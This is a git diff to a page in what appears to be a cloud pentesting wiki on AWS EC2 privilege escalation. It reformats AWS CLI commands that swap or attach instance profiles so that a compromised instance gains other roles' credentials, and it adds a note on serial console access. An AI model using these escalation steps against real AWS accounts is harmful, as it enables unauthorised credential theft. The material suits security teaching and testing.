diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index 69126d9fe1..277cb9304a 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -102,12 +102,13 @@ aws iam add-role-to-instance-profile --instance-profile-name --role-name If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** -* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) - * {% code overflow="wrap" %} - ```bash - aws ec2 associate-iam-instance-profile --iam-instance-profile --instance-id - ``` - {% endcode %} +* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* + +{% code overflow="wrap" %} +```bash +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). @@ -115,20 +116,25 @@ If the **instance profile has a role** and the attacker **cannot remove it**, th With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. -* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it - * {% code overflow="wrap" %} - ```bash - aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da - aws ec2 disassociate-iam-instance-profile --association-id - aws ec2 associate-iam-instance-profile --iam-instance-profile --instance-id - ``` - {% endcode %} -* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). - * {% code overflow="wrap" %} - ```bash - aws ec2 replace-iam-instance-profile-association --iam-instance-profile --association-id - ``` - {% endcode %} +* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* + +{% code overflow="wrap" %} +```bash +aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da +aws ec2 disassociate-iam-instance-profile --association-id +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} + +* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* + +{% code overflow="wrap" %} +```` +```bash +aws ec2 replace-iam-instance-profile-association --iam-instance-profile --association-id +``` +```` +{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). @@ -257,7 +263,7 @@ aws ec2-instance-connect send-ssh-public-key \ ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. +An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.